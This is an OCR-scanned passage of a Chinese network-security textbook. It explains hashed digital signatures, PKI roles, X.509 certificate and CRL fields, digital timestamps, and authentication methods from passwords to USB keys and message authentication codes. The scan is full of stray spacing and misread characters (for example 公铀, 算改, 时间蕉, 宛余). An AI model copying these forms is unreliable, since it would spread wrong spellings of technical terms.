是 能 够 产生 这 一 签名 的 唯一 的 人 。 验 证 算法 使 用 RSA 加 密 规则 er。 任 何人 都 能 验证 签名 ， 
因为 ee 是 公开 的 。 因 此 ， 其 基本 协议 过 程 如 下 。 

(1) Alice 用 其 私 钥 对 文件 加 密 ， 即 对 文件 签名 ; 

(2) Alice 将 签名 后 的 文件 传 给 Bob; 

(3) Bob 用 Alice 的 公 钥 解密 文件 ， 从 而 验证 签名 。 
在 实际 过 程 中 ， 这 种 做 法 的 效率 太 低 了 。 为 了 提高 效率 ， 数 字 签 名 协议 常常 与 Hash 
函数 一 起 使 用 。Alice 并 不 对 这 个 文件 签名 ， 而 是 只 对 文件 的 哈 希 值 (Hasb) 签 名 。 在 下 面 的 
协议 中 ， 哈 希 函数 和 数字 签名 算法 是 事先 协商 好 的 ， 过 程 如 下 。 

(1) Alice 产生 文件 的 哈 希 值 ; 

(2) Alice 用 她 的 私 钥 对 哈 希 值 加 密 ， 以 此 作为 文件 的 签名 ; 

(3) Alice 将 文件 和 哈 希 签名 传 给 Bob; 

(4) Bob 用 Alice 发 送 的 文件 产生 文件 的 哈 希 值 ， 同 时 用 Alice 的 公 钥 对 签名 的 哈 希 解 
密 ; 如 果 签 名 的 哈 希 值 与 自己 产生 的 哈 希 值 匹 配 ， 则 签名 是 有 效 的 。 
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2.2.4 公 钥 基础 设施 (PKI) 


使 用 数字 签名 的 前 提 就 是 要 保证 公 铀 和 私 钥 持 有 人 之 间 的 对 应 关系 ， 即 确认 某 个 人 是 
否 真正 拥有 公 钥 及 对 应 的 私 铀 。 为 解决 这 个 问题 ， 世 界 各 国 进行 了 多 年 的 研究 ， 初 步 形 成 
了 一 套 完 整 的 Intemet 安全 解决 方案 ， 即 目前 被 广泛 采用 的 PKI 技术 一 一 Public Key 
Infrastructure(PKD) 即 公开 密 钥 基 础 设施 。 按 照 X.509 标准 中 的 定义 ，PKI 是 一 个 包括 硬件 、 
软件 、 人 员 、 策 略 和 规程 的 集合 ， 用 来 实现 基于 公 钥 密 码 体制 的 数字 签名 证 书 的 产生 、 管 
理 、 存 储 、 分 发 和 撤销 等 功能 。 

PKI 体系 是 计算 机 软 硬 件 、 权 威 机 构 及 应 用 系统 的 结合 。 它 为 实施 电子 商务 、 电 子 政 
务 、 办 公 自 动 化 等 提供 了 基本 的 安全 服务 ， 从 而 使 那些 彼此 不 认识 或 距离 很 远 的 用 户 能 通 
过 信任 链 安全 地 交流 。PKI 是 基于 “电子 证 书 ”的 系统 ， 类 似 于 用 户 的 “电子 护照 ”， 可 
以 把 电子 证 书 作 为 识别 用 户 身份 的 依据 。 

-个 典型 的 PKI 系统 如 图 2-10 所 示 , 其 中 包括 PKI 策略 、 软 硬件 系统 、 证 书 机 构 CA、 
注册 机 构 RA、 证 书 发 布 系统 和 PKI 应 用 。 


2-10 ”PKI 组 成 框图 


(1) PKI 策略 定义 了 组 织 信息 安全 方面 的 指导 方针 ， 同 时 也 定义 了 密码 系统 使 用 的 处 
理 方法 和 原则 ， 包 括 一 个 组 织 怎样 处 理 密 钥 和 有 价值 的 信息 ， 并 根据 风险 的 级 别 定义 安全 
控制 的 级 别 。 

(2) 证 书 机 构 CA 是 PKI 的 信任 基础 ， 它 管理 公 钥 的 整个 生命 周期 ， 其 作用 包括 : 发 
放 证 书 、 规 定 证 书 的 有 效 期 和 通过 发 布 证 书 废除 列表 (CRL) 确 保 必 要 时 可 以 废除 证 书 。 

(3) 注册 机 构 RA 提供 用 户 和 CA 之 间 的 一 个 接口 ， 它 获取 并 认证 用 户 的 身份 ， 向 CA 
提出 证 书 请 求 。 它 主要 完成 收集 用 户 信息 和 确认 用 户 身份 的 功能 。 这 里 指 的 用 户 ， 是 指向 
认证 中 心 ( 即 CA) 申 请 数字 证 书 的 客户 ， 可 以 是 个 人 ， 也 可 以 是 团体 、 某 政府 机 构 等 。 注 册 
管理 一 般 由 一 个 独立 的 注册 机 构 ( 即 RA) 来 承担 。 它 接受 用 户 的 注册 申请 ， 审 查 用 户 的 申请 
资格 ， 并 决定 是 否 同意 CA 给 用 户 签发 数字 证 书 。 注 册 机 构 并 不 给 用 户 签发 证 书 ， 而 只 是 
对 用 户 进行 资格 审查 。 因 此 ，RA 可 以 设置 在 直接 面 对 客 户 的 业务 部 门 ， 如 银行 的 营业 部 、 
机 构 人 事 部 门 等 。 当 然 ， 对 于 一 个 规模 较 小 的 PKI 应 用 系统 来 说 ， 可 以 把 注册 管理 的 职能 
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交 给 认证 中 心 CA 来 完成 ， 而 不 设立 独立 运行 的 RA。 但 这 并 不 是 取消 了 PKI 的 注册 功能 ， 
而 只 是 将 其 作为 CA 的 一 项 功能 .PKI 国际 标准 推荐 由 一 个 独立 的 RA 来 完成 注册 管理 的 任 
务 ， 可 以 增强 应 用 系统 的 安全 。 

(4) 证 书 发 布 系统 负责 证 书 的 发 放 , 如 可 以 通过 用 户 自 己 , 或 是 通过 目录 服务 器 发 放 。 
目录 服务 器 可 以 是 一 个 组 织 中 现存 的 ， 也 可 以 是 PKI 方案 中 提供 的 。 

(5) PKI 的 应 用 非常 广泛 ， 可 以 应 用 Web 服务 器 和 浏览 器 之 间 的 通信 、 电 子 邮 件 、 电 
子 数据 交换 (EDD、 在 Intemet 上 的 信用 卡 交 易 和 虚拟 私有 网 (VPN) 等 。 

通常 来 说 ，CA 是 证 书 的 签发 机 构 ， 它 是 PKI 的 核心 。 众 所 周知 ， 构 建 密码 服务 系统 
的 核心 内 容 是 如 何 实现 密 钥 管理 。 公 钥 体 制 涉及 一 对 密 钥 ( 即 私 铀 和 公 钥 )， 私 钥 只 由 用 户 
独立 掌握 ， 无 须 在 网 上 传输 ， 而 公 钥 则 是 公开 的 ， 需 要 在 网 上 传送 ， 故 公 钥 体制 的 密 钥 管 
理 主要 是 针对 公 钥 的 管理 问题 ， 目 前 较 好 的 解决 方案 是 数字 证 书 机 制 。 
2.2.5 ”数字 证 书 

数字 证 书 是 一 种 数字 标识 , 可 以 说 是 Intemet 上 的 安全 护照 或 身份 证 明 。 当 人 们 去 其 他 
国家 旅行 时 ， 护 照 可 以 证 实 其 身份 ， 并 被 获准 进入 这 个 国家 。 数 字 证 书 提供 的 是 网 络 上 的 
身份 证 明 。 

数字 证 书 是 一 个 经 证 书 授权 中 心 数字 签名 的 包含 公开 密 钥 拥 有 者 信息 和 公开 密 钥 的 文 
件 。 最 简单 的 证 书包 含 一 个 公开 密 钥 、 名 称 以 及 证 书 授权 中 心 的 数字 签名 。 一 般 情况 下 ， 
证 书 中 还 包括 密 钥 的 有 效 时 间 、 发 证 机 关 ( 证 书 授权 中 心 ) 的 名 称 、 该 证 书 的 序列 号 等 信息 ， 
证 书 的 格式 遵循 X.509 国际 标准 。 

1. 证 书 格式 

在 Internet 网 络 中 ,应 用 程序 使 用 的 证 书 都 来 自 不 同 的 厂商 或 组 织 ,为 了 实现 可 交互 性 ， 
要 求证 书 符合 一 定 的 格式 , 并 实现 标准 化 , 能 够 被 不 同 的 系统 识别 。X.509 为 证 书 及 其 CRL 
格式 提供 了 一 个 标准 ， 它 定义 了 一 个 开放 的 框架 ， 在 一 定 的 范围 内 可 以 进行 扩展 。 

X.509 目前 有 三 个 版 本 : V1、V2 和 V3， 其 中 V3 是 在 V2 的 基础 上 加 上 扩展 项 后 的 版 
本 。X.509 最 早 以 X.500 目录 建议 的 一 部 分 发 表 于 1988 年 ， 并 作为 V1 版 本 的 证 书 格式 。 
X.500 于 1993 年 进行 了 修改 ,在 V1 基础 上 增加 了 两 个 额外 的 域 , 用 于 支持 目录 存 取 控 制 ， 
从 而 产生 了 V2 版 本 。 为 了 适应 新 的 需求 发 展 了 X.509 V3 版 本 证 书 格式 ， 该 版 本 证 书 通 过 
增加 标准 扩展 项 对 V1 和 V2 证 书 进 行 了 扩展 。 另 外 ， 根 据 实际 需要 ， 各 个 组 织 或 团体 也 可 
以 进行 自己 的 私有 扩展 。 

X.509 V1 和 V2 证 书 所 包含 的 主要 内 容 如 下 。 

(1) 证 书 版 本 号 (Version): 版 本 号 指明 X.509 证 书 的 格式 版 本 , 现在 的 值 可 以 为 0、1、 
2， 也 为 将 来 的 版 本 进行 了 预定 义 。 

(2) 证 书 序列 号 (SerialNumbenD: 序列 号 指定 由 CA 分 配给 证 书 的 唯一 的 数字 型 标识 符 。 
当 证 书 被 取消 时 ， 实 际 上 是 将 此 证 书 的 序列 号 放 入 由 CA 签发 的 CRL 中 ,这 也 是 序列 号 唯 
一 的 原因 。 

(3) 签名 算法 标识 符 (Signature): 签名 算法 标识 符 用 来 指定 由 CA 签发 证 书 时 所 使 用 的 
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签名 算法 ， 包 括 公 开 密 钥 算 法 和 HASH 算法 ， 须 向 国际 知名 标准 组 织 (如 ISO) 注 册 。 

(4) 签发 机 构 名 (IssueD: 此 域 用 来 标识 签发 证 书 的 CA 的 X.500 DN 名 字 。 包 括 国家 、 
省 市 、 地 区 、 组 织 机 构 、 单 位 部 门 和 通用 名 。 

(5) 有 效 期 (Validit): 指定 证 书 的 有 效 期 ， 包 括 证 书 开 始 生效 的 日 期 和 时 间 以 及 失效 
的 日 期 和 时 间 。 每 次 使 用 证 书 时 ， 都 要 检查 证 书 是 否 在 有 效 期 内 。 

(6) 证 书 用 户 名 (Subjecb: 指定 证 书 持 有 者 的 义 .500 唯一 名 字 。 包括 国家 、 省 市 、 地 区 、 
组 织 机 构 、 单 位 部 门 和 通用 名 ， 还 可 包含 E-mail 地 址 等 个 人 信息 等 。 

(7) 证 书 持 有 者 公开 密 钥 信息 (Subject Public KeyInfo): 证 书 持 有 者 公开 密 钥 信 息 域 包 
含 两 个 重要 信息 : 证 书 持 有 者 的 公开 密 钥 的 值 ， 公 开 密 钥 使 用 的 算法 标识 符 ， 此 标识 符 包 
含 公开 密 钥 算法 和 HASH 算法 。 

(8) 签发 者 唯一 标识 符 (ssuer Unique IdentifieD: 签发 者 唯一 标识 符 在 V2 版 加 入 证 书 
定义 中 。 此 域 用 在 当 同 一 个 X.500 名 字 用 于 多 个 认证 机 构 时 ， 用 一 个 比特 字符 串 来 唯一 标 
识 签发 者 的 X.500 名 字 。 可 选 。 

(9) 证 书 持 有 者 唯一 标识 符 (Subject Unique IdentifieD: 持 有 证 书 者 唯一 标识 符 在 V2 
版 的 标准 中 加 入 X.509 证 书 定义 中 。 此 域 用 在 当 同一 个 X.500 名 字 用 于 多 个 证 书 持 有 者 时 ， 
用 一 个 比特 字符 串 来 唯一 标识 证 书 持 有 者 的 X.500 名 字 。 可 选 。 

(10) 签名 值 (Issuer’s Signature): 证 书签 发 机 构 对 证 书 上 述 内 容 的 签名 值 。 

X.509 V3 证 书 是 在 V2 的 基础 上 以 标准 形式 或 普通 形式 增加 了 扩展 项 ， 以 使 证 书 能 够 
附带 额外 信息 。 标 准 扩展 是 指 由 义 .509 V3 版 本 定义 的 对 V2 版 本 增加 的 具有 广泛 应 用 前 景 
的 扩展 项 。 任 何人 都 可 以 向 一 些 权威 机 构 ， 如 ISO， 申 请 注册 一 些 其 他 扩展 ， 如 果 这 些 扩 
展 项 应 用 广泛 ， 也 许 会 成 为 标准 扩展 项 。 

2. CRL 格式 


证 书 废除 列表 (Certificate Revocation Lists，CRL) 又 称 证 书 黑 名 单 ， 为 应 用 程序 和 其 他 
系统 提供 了 一 种 检验 证 书 有 效 性 的 方式 。 任 何 一 个 证 书 被 废除 以 后 ， 证 书 机 构 CA 会 通过 
发 布 CRL 的 方式 来 通知 各 个 相关 方 。 目 前 ， 同 X.509 V3 证 书 相对 应 的 CRL 所 包含 的 内 容 
格式 如 下 。 

(1) CRL 的 版 本 号 : 0 表示 X.509 V1 标准 ; 1 表示 X.509 V2 标准 ; 目前 常用 的 是 同 
X.509 V3 证 书 对 应 的 CRL V2 版 本 。 

(2) 签名 算法 : 包含 算法 标识 和 算法 参数 ,用 于 指定 证 书签 发 机 构 对 CRL 内 容 进 行 签 
名 的 算法 。 

(3) 证 书签 发 机 构 名 : 签发 机 构 的 DN 名 ， 由 国家 、 省 市 、 地 区 、 组 织 机 构 、 单 位 部 
门 和 通用 名 等 组 成 。 

(4) 此 次 签发 时 间 : 此 次 CRL 签发 时 间 。 

(5) 下 次 签发 时 间 : 下 次 CRL 签发 时 间 。 

(6) 用 户 公 钥 信息 : 其 中 包括 废除 的 证 书 序 列 号 和 证 书 废除 时 间 。 废 除 的 证 书 序列 号 
是 指 要 废除 的 由 同一 个 CA 签发 的 证 书 的 唯一 标识 号 。 

(7) 签名 值 : 证 书签 发 机 构 对 CRL 内 容 的 签名 值 。 
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3. 证 书 的 存放 


数字 证 书 作 为 一 种 电子 数据 格式 ， 可 以 直接 从 网 上 下 载 ， 也 可 以 通过 其 他 方式 获得 。 
可 以 使 用 IC 卡 存放 用 户 证 书 。 即 把 用 户 的 数字 证 书写 到 IC 卡 中 ， 供 用 户 随身 携带 。 
这 样 用 户 在 所 有 能 够 读 IC 卡 证 书 的 电子 商务 终端 上 都 可 以 享受 电子 商务 服务 。 
用 户 证 书 也 可 以 直接 存放 在 磁盘 或 自己 的 终端 上 。 用 户 将 从 CA 申请 来 的 证 书 下 载 或 
复制 到 磁盘 或 自己 的 PC 或 智能 终端 上 ， 当 使 用 自己 的 终端 享受 电子 商务 服务 时 ， 直 接 从 
终端 读 入 即 可 。 


2.2.6 ”数字 时 间 戳 技术 


在 书面 合同 中 ， 文 件 签署 的 日 期 和 签名 一 样 是 十 分 重要 的 防止 文件 被 伪造 或 算 改 的 关 
键 性 信息 。 在 电子 交易 中 ， 同 样 需 对 交易 文件 的 日 期 和 时 间 信息 采取 安全 措施 ， 而 数字 时 
间 戳 服务 (Digital Time-stamp Service，DTS) 就 能 提供 电子 文件 发 表 时 间 的 安全 保护 。 数 字 
时 间 戳 服务 (DTS) 是 网 上 安全 服务 项 目 ， 由 专门 的 机 构 提 供 。 时 间 蕉 (Time-stamp) 是 一 个 经 
加 密 后 形成 的 凭证 文档 ， 它 包括 三 个 部 分 。 

(1) 需 加 时 间 戳 的 文件 的 摘要 (Digesb 。 

(2) DTS 收 到 文件 的 日 期 和 时 间 。 

(3) DTS 的 数字 签名 。 

时 间 蕉 产 生 的 过 程 为 ， 用 户 首先 将 需要 加 时 间 戳 的 文件 用 HASH 编码 加 密 形成 摘要 ， 
然后 将 该 摘要 发 送 到 DTS, DTS 在 加 入 了 收 到 文件 摘要 的 日 期 和 时 间 信 息 后 再 对 该 文件 加 
密 ( 数 字 签名 )， 然 后 送 回 用 户 。 注 意 ， 书 面 签署 文 件 的 时 间 是 由 签署 人 自己 写 上 的 ， 而 数 
字 时 间 鹤 则 不 然 ， 它 是 由 认证 单位 DTS 来 添加 的 ， 以 DTS 收 到 文件 的 时 间 为 依据 。 因 此 
时 间 鹤 也 可 作为 科学 家 的 科学 发 明文 献 的 时 间 认 证 。 


2.3 认证 技术 


网 络 系统 安全 要 考虑 两 个 方面 。 一 方面 ， 用 密码 保护 传送 的 消息 使 其 不 被 破译 ， 另 一 
方面 ,， 就 是 防止 对 手 对 系统 进行 主动 攻击 ， 如 伪造 、 算 改 消息 等 。 认证 (Authentication) 则 是 
防止 主动 攻击 的 重要 技术 ， 它 对 开放 的 网 络 中 的 各 种 信息 系统 的 安全 性 有 重要 作用 。 认 证 
的 目的 有 两 个 方面 : 一 是 验证 信息 的 发 送 者 是 合法 的 ， 而 不 是 冒充 的 ， 二 是 验证 信息 的 完 
整 性 ， 以 及 数据 在 传输 和 存储 过 程 中 没有 被 算 改 。 

认证 技术 一 般 可 以 分 为 以 下 两 种 。 

。 ”身份 认证 : 鉴别 用 户 的 身份 是 否 是 合法 用 户 。 

。 ”消息 认证 : 用 于 保证 信息 的 完整 性 和 抗 否认 性 。 在 很 多 情况 下， 用户 要 确认 网 上 

信息 是 不 是 假 的， 信息 是 否 被 第 三 方 算 改 或 伪造 ， 这 就 需要 消息 认证 。 
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2.3.1 身份 认证 的 重要 性 


相信 大 家 都 记得 这 样 一 幅 漫 画 ， 一 条 狗 在 计算 机 面前 一 边 打 字 ， 一 边 对 另 一 条 狗 说 : 
“在 互联 网 上 ， 没 有 人 知道 你 是 一 个 人 还 是 一 条 狗 ! ”这 个 漫画 说 明了 在 互联 网 上 很 难 进 
行 身份 识别 。 

身份 认证 是 指 计算 机 及 网 络 系统 确认 操作 者 身份 的 过 程 。 计 算 机 和 计算 机 网 络 组 成 了 
一 个 虚拟 的 数字 世界 。 在 这 个 数字 世界 中 ， 一 切 信息 包括 用 户 的 身份 信息 都 是 由 一 组 特定 
的 数据 表示 ， 计 算 机 只 能 识别 用 户 的 数字 身份 ， 给 用 户 的 授权 也 是 针对 用 户 数字 身份 进行 
的 。 而 我 们 生活 的 现实 世界 是 一 个 真实 的 物理 世界 ， 每 个 人 都 拥有 独一无二 的 物理 身份 。 
如 何 保证 以 数字 身份 进行 操作 的 访问 者 就 是 这 个 数字 身份 的 合法 拥有 者 ， 即 如 何 保证 操作 
者 的 物理 身份 与 数字 身份 相对 应 ， 就 成 为 一 个 重要 的 安全 问题 。 身 份 认证 技术 的 诞生 就 是 
为 了 解决 这 个 问题 。 

如 果 没 有 有 效 的 身份 认证 手段 ， 访 问 者 的 身份 就 很 容易 被 伪造 ， 使 得 未 经 授权 的 人 仿 
冒 有 权限 人 的 身份 ， 这 样 ， 任 何 安全 防范 体系 就 都 形同虚设 ， 所 有 安全 投入 就 都 被 无 情 地 
浪费 了 。 


2.3.2 身份 认证 的 方式 


“ 世 肪 ， 芝 麻 ， 开 门 吧 ! ”一 个 咒语 密码 ， 帮 助 阿 里 巴巴 打开 了 财富 之 门 。 从 传说 中 
“芝麻 开门 ”的 咒语 ， 到 后 来 的 按 手 印 、 支 票 签名 ， 再 到 现在 的 安全 密码 认证 、 数 字 签 名 、 
生物 识别 …… 身 份 认证 与 身份 识别 技术 的 发 展 从 来 都 没有 停止 过 。 

目前 ， 计 算 机 及 网 络 系统 中 常用 的 身份 认证 方式 主要 有 以 下 几 种 。 

1. 用 户 名 /密码 方式 

用 户 名 /密码 是 最 简单 也 是 最 常用 的 身份 认证 方法 ， 它 是 基于 “what you know ”的 验证 
手段 。 每 个 用 户 的 密码 是 由 每 个 用 户 自 己 设 定 的 ， 只 有 他 自己 才 知道 ， 因 此 只 要 能 够 正确 
输入 密码 ， 计 算 机 就 认为 他 就 是 这 个 用 户 。 

在 哈里 森 。 福特 主演 的 《防火 墙 》 中 ， 残 忍 的 比尔 。 考 克 斯 疯狂 地 绑架 了 杰克 的 妻子 
和 一 双 儿 女 ， 要 挟 他 交 出 银行 安全 防御 系统 的 破解 密码 ， 然 后 侵入 银行 的 系统 窃取 了 100 
万 美元 巨 款 。 

任何 一 个 用 户 只 要 能 够 正确 输入 密码 ， 计 算 机 就 认为 他 是 合法 用 户 ， 但 他 的 网 络 行为 
可 信 吗 ? 我 们 无 从 得 知 。 实 际 上 ， 由 于 许多 用 户 为 了 防止 忘记 密码 ， 经 常 采用 诸如 自己 的 
生日 、 电 话 号 码 等 有 意义 的 字符 串 作为 密码 ， 甚 至 有 人 将 密码 贴 在 自己 的 显示 器 上 方 。 即 
使 能 保证 用 户 密码 不 被 泄漏 ， 由 于 密码 是 静态 的 数据 ， 并 且 在 验证 过 程 中 ， 需 要 在 计算 机 
内 存 中 和 网 络 中 传输 ， 而 每 次 验证 过 程 使 用 的 验证 信息 都 是 相同 的 ， 很 容易 被 驻 留 在 计算 
机 内 存 中 的 木马 程序 或 网 络 中 的 监听 设备 截获 。 因 此 用 户 名 /密码 方式 是 一 种 极 不 安全 的 身 
份 认证 方式 。 
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2. IC 卡 认证 


IC 卡 是 一 种 内 置 了 集成 电路 的 卡片 ， 卡 片 中 存 有 与 用 户 身份 相关 的 数据 ， 可 以 认为 是 
不 可 复制 的 硬件 。IC 卡 由 合法 用 户 随 身 携带 ， 登 录 时 必须 将 IC 卡 插入 专用 的 读 卡 器 中 读 
取 其 中 的 信息 ， 以 验证 用 户 的 身份 。IC 卡 认 证 是 基于 “what you have” 的 手段 ， 通 过 IC 卡 
硬件 的 不 可 复制 性 来 保证 用 户 身份 不 会 被 仿冒 。 

然而 由 于 每 次 从 IC 卡 中 读 取 的 数据 还 是 静态 的 , 通过 内 存 扫描 或 网 络 监 听 等 技术 还 是 
很 容易 能 截取 到 用 户 的 身份 验证 信息 。 因 此, 静态 验证 的 方式 还 是 存在 着 根本 的 安全 隐患 。 

3. 动态 口令 

信息 系统 中 ， 通 过 一 个 条 件 的 符合 来 证 明 一 个 人 的 身份 被 称 为 单 因 子 认 证 ， 由 于 仅 使 
用 一 种 条 件 判 断 用 户 的 身份 容易 被 仿冒 ， 所 以 可 以 通过 组 合 两 种 不 同 条 件 来 证 明 一 个 人 的 
身份 ， 这 被 称 为 双 因 子 认 证 。 从 认证 信息 来 看 ， 可 以 分 为 静态 认证 和 动态 认证 。 身 份 认 证 
技术 的 发 展 ， 经 历 了 从 软件 认证 到 硬件 认证 ， 从 单 因子 认证 到 双 因子 认证 ， 从 静态 认证 到 
动态 认证 的 过 程 。 

动态 口令 技术 是 一 种 让 用 户 的 密码 按照 时 间或 使 用 次 数 不 断 动态 变化 ， 每 个 密码 只 使 
用 一 次 的 技术 ， 我 们 称 之 为 一 次 性 口令 (One-Time Password，OTP) 机 制 。 它 采用 一 种 称 为 
动态 令 牌 的 专用 硬件 ， 由 密码 生成 芯片 运行 专门 的 密码 算法 ， 根 据 当前 时 间或 使 用 次 数 生 
成 当前 密码 。 用 户 使 用 时 只 需要 将 动态 令 牌 上 显示 的 当前 密码 输入 客户 端 计算 机 ， 即 可 实 
现 身 份 的 确认 。 

在 OTP 认证 系统 ， 你 需要 拥有 一 些 东西 (你 的 令 牌 卡 / 软 件 ) 和 知道 一 些 东西 (你 的 个 人 
识别 码 (Personal Identification Number, PIN))。 生 成 和 同步 密码 的 方法 随 OTP 系统 的 不 同 而 
不 同 。 在 比较 流行 的 OTP 方法 中 ， 令 牌 卡 在 一 个 时 间 间 隔 内 (通常 为 60s) 生 成 登录 密码 
(Passcode)。 这 个 看 上 去 随机 的 数字 串 实际 上 与 OTP 服务 器 和 令 牌 上 运行 的 数学 算法 紧密 
相关 。 

4. 智能 卡 技术 

应 该 说 智能 卡 本 身 就 可 以 算是 一 个 功能 齐全 的 计算 机 ， 它 们 有 自己 的 内 存 、 微 处 理 器 
和 智能 卡 读 取 器 的 串 行 接口 ， 这 些 被 包含 在 一 个 信用 卡 大 小 或 是 更 小 的 介质 里 。 比 如 全 球 
移动 通信 系统 (Global System for Mobile Communications，GSMC) 电 话 的 客户 身份 识别 卡 
(Subscriber Identity Modules，SIMD)。 

以 安全 的 观点 看 ， 智 能 卡 提供 了 在 卡 里 存储 身份 识别 信息 的 能 力 ， 该 信息 能 够 被 智能 
卡 阅 读 器 读 取 。 智 能 卡 阅 读 器 能 够 连 到 PC 上 验证 VPN 连接 或 访问 另 一 个 网 络 系统 的 用 户 。 
智能 卡 是 比 PC 本 身 更 为 安全 的 存储 密 钥 的 地 方 ， 因 为 即使 你 的 计算 机 完全 被 别人 掌握 ， 
你 的 私 钥 也 不 会 随 之 一 起 被 盗 ， 所 以 你 的 身份 对 于 网 络 应 用 系统 来 说 依然 是 可 信任 的 。 


5. 生物 特征 认证 


好 莱 坞 电影 ， 例 如 《 回 到 未 来 》、《 碟 中 碟 3》 中 出 现 过 用 视网膜 、 掌 形 、 指 纹 等 作 
为 身份 识别 手段 的 场景 ， 可 以 推测 ， 未 来 将 是 以 生物 特征 识别 作 认证 的 世界 。 所 谓 生物 识 
别 ， 可 以 这 样 简单 地 理解 : 用 钥匙 开门 是 用 你 拥有 的 东西 ， 使 用 密码 是 用 你 知道 的 东西 ， 
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而 用 视网膜 等 生物 特征 则 是 用 你 身体 的 一 部 分 。 换 言 之， 你 也 许 会 丢掉 钥匙 或 是 忘记 密码 ， 
但 用 自己 身体 的 一 部 分 则 没有 这 样 的 顾虑 。 

由 奥斯卡 影帝 尼古拉斯 。 凯 奇 主 演 的 《国家 宝藏 》 中 ， 他 把 墨水 放 入 古 币 里 ， 当 集 
安 " 克 鲁 格 玩 古 币 时 ， 手 沾 上 墨水 ， 指 纹 留 在 了 透明 胶带 上 ， 他 用 透明 胶带 上 的 指纹 打开 
第 一 道门 (在 现实 中 是 不 可 能 的 )。 

生物 特征 认证 是 指 采 用 每 个 人 独一无二 的 生物 特征 来 验证 用 户 身份 的 技术 。 由 于 生物 
特征 本 身 与 传统 的 密码 等 身份 识别 相 比 ， 具 有 很 大 的 优点 ， 因 此 得 到 了 广泛 且 深入 的 研究 
和 应 用 。 目 前 较 常用 的 进行 身份 识别 的 生物 特征 有 : 面相 、 指 纹 、 虹 膜 、 声 纹 、 步 态 、 签 
名 等 。 从 理论 上 说 ， 生 物 特征 认证 是 最 可 靠 的 身份 认证 方式 ， 因 为 它 直接 使 用 人 的 物理 特 
征 来 表示 一 个 人 的 数字 身份 ， 不 同 的 人 具有 相同 生物 特征 的 可 能 性 可 以 忽略 不 计 ， 因 此 几 
平 不 可 能 被 仿冒 。 
在 前 几 年 ， 由 于 研发 投入 较 大 和 产量 较 小 的 原因 ,使 生物 特征 认证 系统 的 成 本 非常 高 ， 
无 法 做 到 大 面积 推广 。 随 着 这 项 技术 的 不 断 成 熟 ， 其 造价 也 逐步 下 降 ， 于 是 出 现 了 指纹 识 
别 笔记 本 、 指 纹 避 盘 、 指 纹 加 密 器 等 产品 。 生 物 识 别 技术 与 计算 机 技术 的 紧密 结合 ， 满 足 
了 现代 企业 对 数据 的 安全 性 和 可 靠 性 管理 的 需求 ， 特 别 为 企业 管理 人 员 等 对 公司 机 密 接触 
较 多 的 人 员 ， 提 供 了 更 好 的 信息 安全 解决 方案 。 

事实 上 ,以 加 速 指纹 产品 全 民 应 用 时 代 来 临 的 例子 已 经 出 现 : 256MB 的 指纹 U 盘 如 今 
的 市 场 价格 也 就 几 十 元 。 在 信息 价值 已 大 于 硬件 价格 的 前 提 下 ， 生 物 识别 产品 的 市 场 和 应 
用 前 景 无 疑 是 巨大 的 。 

6. USB Key 认证 

基于 USB Key 的 身份 认证 方式 是 一 种 方便 、 安 全 、 经 济 的 身份 认证 方式 ， 它 采用 软 硬 
件 相 结 合 、 一 次 一 密 的 双 因 子 认 证 模式 ， 很 好 地 解决 了 安全 性 与 易 用 性 之 间 的 矛盾 。 

USB Key 是 一 种 USB 接口 的 硬件 设备 ， 它 内 置 单片机 或 智能 卡 芯片 ,可 以 存储 用 户 的 
密 钥 或 数字 证 书 ， 利 用 USB Key 内 置 的 密码 算法 实现 对 用 户 身份 的 认证 。 基 于 USB Key 
的 身份 认证 系统 主要 有 两 种 应 用 模式 : 一 是 基于 冲击 /响应 的 认证 模式 ; 二 是 基于 PKI 体系 
的 认证 模式 。 


2.3.3 消息 认证 


消息 认证 实际 上 是 对 消息 本 身 产生 一 个 匈 余 的 信息 一 一 MAC( 消 息 认 证 码 )，MAC 全 
称 为 Message Authentication Code( 消 息 认 证 码 )， 是 用 来 保证 数据 完整 性 的 一 种 工具 。 数 据 
完整 性 是 信息 安全 的 一 项 基本 要 求 ， 它 可 以 防止 数据 未 经 授权 被 算 改 。 随 着 网 络 技 术 的 不 
断 进步 ， 尤 其 是 电子 商务 的 不 断 发 展 ， 保 证 信息 的 完整 性 变 得 越 来 越 重要 。 特 别 是 双方 在 
一 个 不 安全 的 信道 上 通信 的 时 候 ， 就 需要 有 一 种 方法 能 够 保证 一 方 所 发 送 的 数据 能 被 另 一 
方 验证 是 正确 的 ， 即 能 够 防止 数据 未 经 授权 被 算 改 。 消 息 认证 码 就 能 够 达到 这 一 目的 。 

MAC 的 定义 域 为 信 源 消息 和 密 钥 集 合 , 值 域 为 由 定 长 比特 的 一 个 编码 函数 算得 的 数值 
(认证 码 或 认证 符 )， 表 示 为 


MAC=C(K.M) 
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消息 认证 码 的 方法 是 : 首先 在 参与 通信 的 两 方 之 间 共 享 一 个 密 钥 ,通信 时 (这 里 使 用 A 
和 B 代表 参与 通信 的 两 方 )，A 方 传送 一 个 消息 给 B 方 ， 并 将 MAC 附加 在 这 一 消息 之 后 
传送 给 B 方 。B 在 接收 到 该 消息 后 通过 计算 C( K,M ) 来 检验 与 收 到 的 MAC 是 否 一 致 来 判 
断 消息 的 真 伪 ， 如 果 这 两 个 标记 相同 ，B 就 认为 消息 在 由 A 传送 到 B 的 过 程 中 没有 被 算 
改 ; 如 果 不 相同 , B 就 认为 消息 在 传送 过 程 中 被 算 改 了 。 消息 认证 码 的 原理 如 图 2-11 所 示 。 


乓 一 一 SourceA 一 一 > 才 - 一 一 DestinationB ——— > 
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2-11 消息 认证 的 原理 


实现 消息 认证 可 以 有 多 种 途径 ， 主 要 有 校 验 码 方案 和 消息 摘要 方案 。 校 验 码 是 数据 遂 
信 中 经 常用 到 的 差错 控制 手段 ， 实 际 上 稍 加 扩充 也 可 以 作为 认证 码 。 消 息 摘要 方案 是 利用 
目前 广泛 应 用 的 单 向 散 列 函数 (Hash 函数 ， 又 称 杂 凑 函 数 ) 来 生成 Hash 值 来 作为 认证 码 。 

1. 校 验 码 方案 

校 验 码 是 差错 控制 中 的 检 错 方法 ， 数 据 通 信 中 的 噪声 使 得 传输 的 比特 值 改变 ， 用 校 验 
码 可 以 检测 出 来 ， 同 样 道理 ， 一 些 人 为 造成 的 比特 值 的 改变 ， 使 用 校 验 码 也 是 可 以 检测 出 
来 的 。 其 实现 方案 是 将 校 验 码 作为 应 用 层 的 数据 传送 ， 在 消息 发 送 时 ， 使 用 选 定 的 校 验 码 
方案 对 将 要 发 送 的 消息 产生 宛 余 的 码 值 ， 对 该 码 值 加 密 处 理 并 随 消 息 一 并 发 送 ， 接 收 方 对 
